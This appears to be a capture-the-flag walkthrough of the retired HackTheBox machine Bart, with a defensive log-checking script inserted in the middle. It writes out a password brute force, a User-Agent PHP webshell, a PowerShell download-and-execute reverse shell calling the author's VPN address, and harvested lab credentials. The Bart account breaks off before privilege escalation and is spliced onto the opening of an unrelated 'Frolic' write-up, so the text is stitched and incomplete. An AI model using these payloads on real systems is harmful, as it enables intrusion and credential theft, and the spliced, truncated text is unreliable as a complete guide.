
HacktheBox - Bart - Retired





Recon

I've been using threader3000 for a while to do my initial scanning on HTB. I've recently started to use a variant named threader3000, which can automatically run the nmap scan on the open ports it finds.



Only port 80 open.


It is an IIS server, and it also shows a redirect to http://forum.bart.htb. Since it is IIS we can pretty safely assume this is a Windows box.


Let's check it out.




Nothing…

This might just be a DNS resolution issue. Let's add forum.bart.htb to our /etc/hosts to see if that fixes it.


We can use vi to add the line

10.10.10.81 forum.bart.htb




Now let's try this again.


Not much to go on here, just a list of employee names (we will file that away for the future).



Let's run a directory brute force against the server and see if we can find anything interesting.






One of the results of the dirb scan is


http://bart.htb/monitor/


Let's check that out.


A server monitor page, but it looks like it requires authentication.


Looks like this webapp is PHP Server Monitor v3.2.1


Let's google it and see what we can learn about it.



We can try to look around for default logins and such… but I came up empty on that front.


Hey… There is a Forgot Password link there. I wonder what it does?


It asks for a username. Let's try with just test as the username.



Ok, we found some employee names on the forum.bart.htb site. Let's try some of those names:


Samantha Brown

Daniel Simmons

Robert Hilton


These names are all listed in the Our Team section… But wait there's more.


In the latest News section, there is a post about Daniella Lamborghini being a new employee, let's make sure we include that name too.


I ran Cewl against the site too, I wanted to see if I might have missed any names.


Cewl is a crawler that pulls all the words off a website and displays just the list of words. I sent my results to a text file to make it easier to look through:


cewl http://forum.bart.htb  > cewl.txt





Also from the Employee section we can see that the company's email addresses follow the pattern first initial.lastname@bart.htb:


s.brown@bart.htb


So we can build out a quick list of what these employees' email addresses probably are:



s.brown@bart.htb

d.simmons@bart.htb

r.hilton@bart.htb

d.lamborghini@bart.htb



Let's try these as usernames in the server monitor forgot password form, starting with Mr. Hilton since he is in charge of the tech according to the meet the team page.



Nada… Let's go back to our cewl output.



There is one more name showing up that I can't find anywhere on the site… Harvey



Let's search for it in the source code for the site.


Found them, commented out in the employees section. Looks like a developer that might no longer be with the company.



Harvey Potter….. No comment



So they would be h.potter@bart.htb…… still not going to touch that name :)



Now if we try forgot password for the username harvey we get this message back:



An email has been sent with password reset instructions. So the username harvey is valid for this site. (The different reply for a known versus unknown name is a username enumeration oracle; a reset form should answer identically either way.)








Exploit




So now we can try to brute force Harvey's password using the cewl.txt we created earlier. Let's take a second and modify our cewl.txt to have three versions of each word found: the original, all uppercase and all lowercase, just to make our lives a little easier. We can use tr (translate) to feed cewl.txt into new files that convert it to these other forms and then combine the lists.


To convert it to all uppercase we use:

tr '[:lower:]' '[:upper:]' < cewl.txt > cewl-upper.txt


To convert to lowercase we simply swap the translation around:

tr '[:upper:]' '[:lower:]' < cewl.txt > cewl-lower.txt



Then we can append these two files to our original cewl.txt:


cat ./cewl-lower.txt >> cewl.txt
cat ./cewl-upper.txt >> cewl.txt


We can use Hydra to perform the attack, but first let's start up Burp Suite to make sure we can format our attack correctly.

Let's capture a bad login using burp suite.




Here we can start extracting what is needed for our hydra attack:


user_name=harvey

user_password=test

action=login


Since this site uses cookies we will need to add that to our hydra command too, or it will not work correctly (it will actually report every candidate as a valid password; I learned this the hard way :) )


This takes a bit, so let's up the number of threads we are using with hydra to 50.


We just need to add the switch -t 50.


We also need to know what is displayed on a failed login so hydra knows what to filter on.



The information is incorrect


So our final hydra command should be:




hydra -t 50 -l harvey -P ./cewl.txt monitor.bart.htb http-post-form "/index.php:csrf=3409752aaae7cec9adf2eca6c9ac381d097f269a51652a689c29bbb670d129f6&user_name=^USER^&user_password=^PASS^&action=login:F=incorrect:H=Cookie\: PHPSESSID=8ar4p17mgu9lfdgu392c6j6o8c"






OMG… this was taking forever so I switched tactics and went with an intruder sniper attack in burp.




Let's go back to burp and send our failed request over to intruder.






Once we click on the Positions tab we can see that Burp tried to determine the attack points for us and highlighted several parameters in the POST request.




So let's hit clear to get back to nothing selected.



Now we will highlight just our password, since that is the only thing we want to change with Intruder, and select Add §.




Now it has selected just the password for our attack, so we will go over to the Payloads tab and input our cewl list.



Now, in the paid version of Burp you can load the payloads from a file, but I'm using the Community Edition so I have to highlight all the words in my list, copy them, and then use the Paste button here to load the list.



And now our attack is ready. You can see our payload list loaded up now.






Let's click on Start Attack.




Now we will see the requests with their response status codes and response lengths.



Now we wait until it iterates over our payload list.


What we are looking for here is a difference in either the status or the length.


For every wrong password tried, it should essentially return the same error page, which should be the same length. So we can look for results that aren't 3926 in length.


After our attack has run (and it took a very long time to run… like hours for me)


We sort by status code to see if there is anything other than 200 (which simply means OK).

Here we can see a status code of 302 (which is a redirect) for the password potter, so this might be the password we are looking for.










Let's try to login with Harvey:potter








Winner winner chicken dinner!!


Let's poke around in here and see what else we might find.


We can see a new subdomain here.



Internal-01.bart.htb


Let's add that to our hosts file and see what we might find there.




We got another login screen. Oi


The same user/pass we used for the Server Monitor doesn't work here; the password is not long enough (it says we need 8 characters).


Let's throw dirb at this new domain and see if we can find anything else interesting being served here.



Let's see if this is some sort of common chat program; just grab the last part of the URL,


simple_chat/Login_form.php and pop it into google.


Looks like it might be an AJAX chat that is on GitHub:


https://github.com/magkopian/php-ajax-simple-chat/blob/master/README.md


It looks like there should be a registration page.



Let's see if we can verify this is the right thing.


If we start gobuster on it:




gobuster dir -u http://internal-01.bart.htb/simple_chat -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt





Looks like the directory structure is matching pretty well.


Let's try to bring up the registration page to see if we can create a new user.




Well that's a wrench….


But wait, it looks like it did redirect us to register_form.php, so we might still be on the right path.


If we look at the code for register_form.php:


https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/register_form.php


Here in the code it looks like it just needs two inputs, one named uname (which we can assume is username) and another named passwd (which we can assume is password).




So what if we just send those two in a POST to register.php, can we still add a new user?


Let's try to send a POST request using curl. We just need to use the -d switch to supply the two fields we want to send.


https://www.educative.io/edpresso/how-to-perform-a-post-request-using-curl




curl -d "uname=circusmonkey&passwd=test1234" -X POST http://internal-01.bart.htb/simple_chat/register.php




Now we can try to login with these new credentials:


circusmonkey

test1234


We are in…. Not much here though… let's poke around.


We can enter text and it shows up in the chat window..


There is a Refresh and a Log link in the top right; let's check out the source code.





<div id="wrapper">
<!-- <div id="title"><h1>[DEV] Internal Chat</h1></div>
<div id="title"><h1>Internal use only</h1></div> -->
<div id="refresh_link"><a href=".">Refresh</a></div>
<div id="log_link">
<script>
function saveChat() {
// create a serialized object and send to log_chat.php. Once done hte XHR request, alert "Done"
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        alert(xhr.responseText);
    }
}
xhr.open('GET', 'http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey', true);
xhr.send(null);
alert("Done");
}
</script>
<a href="#" onclick="saveChat()">Log</a>
</div>

<!-- The format of one message:
<div id="message_[message_id]">
<a href="#">[username] </a>says:
<p>[message_content]</p>
</div>
-->






Clicking on the Log button


We get these messages:






Let's see what happens when we go to the link in the code:


http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey




We see the same 1 we saw in the alert box.


Looks like there are a couple of values we can mess with here… filename and username


What happens if we change filename to log.php itself?


http://internal-01.bart.htb/log/log.php?filename=log.php&username=harvey



If we circle back to the txt file we can see it added our user agent to the log file.




So now we have another thing we can fuss with..


The useragent.



Let's capture this in burp and edit our user agent.




I'm just going to set it to "Testy McTestFace"


It says ok on the response. And if we look at the txt file again we can see it put what we wanted in there.


So we can write whatever we want to this text file….. This is PHP so what if we send it some PHP?


Let's start with Hello world.


The PHP code for that is 


<?php echo "Hello World"; ?>



And we can put that in our user agent.


And we see this in the output.



Looks like we can use this to execute PHP.


Let's try and ping out to our Kali box.


Let's make the User-Agent

<?PHP exec('ping 10.10.14.2') ?>





Before we send this GET request, let's set up tcpdump to alert us to ICMP traffic on our HackTheBox VPN interface.


tcpdump -i tun0 -n icmp


-i specifies which interface to listen on, in this case our VPN tunnel

-n turns off name resolution so the output isn't slowed down by DNS lookups, and the trailing icmp is the capture filter that restricts the output to just ping traffic



Now we can send our request.



And here we can see the pings coming in from the server.


Now what?

Now we need to pop our shell.


For grins and giggles I tried changing the filename in my request from log.php to log99.php to see if we could write new files.


Turns out we can; the code execution still works.


If you are unfamiliar with PHP webshells, this is a great resource, and where I got my code for the next part:


https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/



So we can write our own php file to the server.


Let's use this to create PHP that will accept an argument called cmd.


Let's change our User-Agent to


<?php system($_GET['cmd']);?>







GET /log/log.php?filename=log.php&username=harvey HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php system($_GET['cmd']);?>
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://internal-01.bart.htb/
Cookie: PHPSESSID=kruk43eefa6bhj0hi93j76aqm8








After we send this GET we can then start passing commands to the system using the cmd variable we created.


Let's start simple and pass dir, since this is a Windows box, to make sure it's working:

GET /log/log.php?filename=log.txt&username=harvey&cmd=dir





And we got our directory listing back!



So we can send system commands using the variable we injected.
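As an added example that is not part of this writeup, here is a small Python checker from the defender's side of the two web-side techniques above: the login brute force against monitor.bart.htb (a run of same-length 200 responses to POST /index.php, then a 302 on the right password) and the log.php poisoning chain (a filename parameter other than log.txt, a PHP open tag in the User-Agent, and a cmd parameter). The log lines are constructed for the example and the field order is an assumption, so adapt LINE_RE to your IIS W3C field layout.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample lines (not logs from the real box). Assumed field order:
# time method uri-stem uri-query client-ip user-agent status bytes ('+' for UA spaces).
SAMPLE_LOG = """\
12:00:01 POST /index.php - 10.10.14.12 Mozilla/5.0 200 3926
12:00:02 POST /index.php - 10.10.14.12 Mozilla/5.0 200 3926
12:00:02 POST /index.php - 10.10.14.12 Mozilla/5.0 302 0
12:05:10 GET /log/log.php filename=log.txt&username=harvey 10.10.14.12 Mozilla/5.0 200 1
12:05:30 GET /log/log.php filename=log.php&username=harvey 10.10.14.12 <?php+system($_GET['cmd']);?> 200 1
12:05:45 GET /log/log.php filename=log.txt&username=harvey&cmd=dir 10.10.14.12 Mozilla/5.0 200 842
12:06:00 GET /index.php - 10.10.14.13 curl/7.68.0 200 5120
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)  # <?php, <?PHP, <?=

def parse(line):
    """Split one log line into a dict; returns None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    t, method, stem, query, ip, ua, status, nbytes = m.groups()
    params = {} if query == "-" else {k: v[0] for k, v in parse_qs(query).items()}
    return {"time": t, "method": method, "stem": stem, "query": params, "ip": ip,
            "ua": ua.replace("+", " "), "status": int(status), "bytes": int(nbytes)}

def find_login_bruteforce(events, threshold=20):
    """(ip, failed_posts, got_302): many same-size 200s to the login form, then a 302."""
    per_ip = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["stem"] == "/index.php":
            per_ip[e["ip"]].append(e)
    hits = []
    for ip, evs in per_ip.items():
        failures = [e for e in evs if e["status"] == 200]
        if len(failures) >= threshold and len({e["bytes"] for e in failures}) == 1:
            hits.append((ip, len(failures), any(e["status"] == 302 for e in evs)))
    return hits

def find_log_poisoning(events):
    """Tells of the log.php chain: filename other than log.txt, PHP tag in UA, cmd param."""
    findings = []
    for e in events:
        if e["stem"] != "/log/log.php":
            continue
        fname = e["query"].get("filename", "log.txt")
        if fname != "log.txt":
            findings.append((e["time"], e["ip"], "filename=" + fname))
        if PHP_TAG.search(e["ua"]):
            findings.append((e["time"], e["ip"], "PHP tag in User-Agent"))
        if "cmd" in e["query"]:
            findings.append((e["time"], e["ip"], "cmd=" + e["query"]["cmd"]))
    return findings

def scan(log_text, threshold=20):
    events = [e for e in map(parse, log_text.splitlines()) if e]
    return find_login_bruteforce(events, threshold), find_log_poisoning(events)
```

The threshold is low in the test below only because the sample is tiny; against real logs the interesting signal is the hundreds of identical-length failures the Intruder run leaves behind, not the final 302.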


That's cool and all but what about a real shell?


We can try a number of things like putting netcat on here or sending over the nishang reverse shell script… our options are almost limitless.



https://bad-jubies.github.io/RCE-NOW-WHAT/


This blog walks us through using our new cmd variable with PHP to download and invoke nishang's Invoke-PowerShellTcp.ps1.



I'm going to deviate slightly from the blog post. Instead of stringing together two PowerShell commands to download and then execute the reverse shell, let's modify the PS1 script to include the invocation at the end so it will self-execute with the correct settings after it's downloaded.



To do this we simply edit the Invoke-PowerShellTcp.ps1 script and add the invocation at the end of the script:




Invoke-PowerShellTcp -Reverse 10.10.14.12 -Port 5555



This is my VPN IP as well as the port I want the reverse shell to come in on. I saved this to my /bart folder.


Just a couple more steps before we can test this out.


We need a way to serve this PS1 file over to Bart, we need to set up our listener to catch our reverse shell, and we are going to need to encode our payload so it reaches Bart the right way.


First let's use updog to serve the file up. It defaults to port 9090.


updog


┌──(kali㉿kali)-[~/Desktop/HTB/bart]
└─$ /home/kali/.local/bin/updog
[+] Serving /home/kali/Desktop/HTB/bart...
* Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)


Ok, next our listener.


nc -lnvp 5555



Now we need to format our command. The final command we want to run is



powershell.exe -ExecutionPolicy bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:9090/Invoke-PowerShellTcp.ps1')


But we will need to URL encode this so it keeps all our formatting.


We can use Burp's built in convert function to handle this for us.



Now we should just need to hit send and hopefully catch our shell.




woot !


We got our shell. Now we need to figure out what we need to do to escalate our privileges from IUSR.


It's always a good idea to poke around in the directory you land in as well as the directories around it; you might find creds in configuration files.


Just like C:\inetpub\wwwroot\monitor\config.php:

PS C:\inetpub\wwwroot\monitor> type config.php
<?php
define('PSM_DB_HOST', 'localhost');
define('PSM_DB_PORT', '3306');
define('PSM_DB_NAME', 'sysmon');
define('PSM_DB_USER', 'daniel');
define('PSM_DB_PASS', '?St4r1ng1sCr33py?');
define('PSM_DB_PREFIX', '_');
define('PSM_BASE_URL', 'http://monitor.bart.htb');


Looks like daniel's password for this application is ?St4r1ng1sCr33py?


Maybe that will help us down the road.


It just so happens that those are the same creds he uses to log in to the monitor.bart.htb site.



We can continue to poke around, but no obvious path forward is revealing itself.


Let's run winPEAS on this to see if it can help us with a path.



First we need to copy winPEAS.exe to the folder we are serving up with updog.


If you don't have it, grab a copy from their GitHub:


https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite


Then we can use PowerShell to download it to a temp directory (which doesn't exist, so we need to make it first with mkdir C:\temp):



Invoke-WebRequest -Uri "http://10.10.14.12:9090/winPEAS.exe" -OutFile "C:\temp\winPEAS.exe"


Then we can execute C:\temp\winPEAS.exe.


Once it's done executing, this bit really grabs my attention:

[+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  DESKTOP-7I3S68E
    DefaultUserName               :  Administrator
    DefaultPassword               :  3130438f31186fbaf962f407711faddb




Auto login is present for the administrator account with their password!


Now if this were Linux we could just su and switch over to the administrator account.

I found this blog that looks like it fits perfectly for what we want to do:


https://davidhamann.de/2019/12/08/running-command-different-user-powershell/


powershell.exe -c "$user='WORKGROUP\John'; $pass='password123'; try { Invoke-Command -ScriptBlock { Get-Content C:\Users\John\Desktop\secret.txt } -ComputerName Server123 -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1

 

We will need to modify this a bit to use the credentials we found. I also want it to spawn a new reverse shell back to my Kali box so we have full command execution.


HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar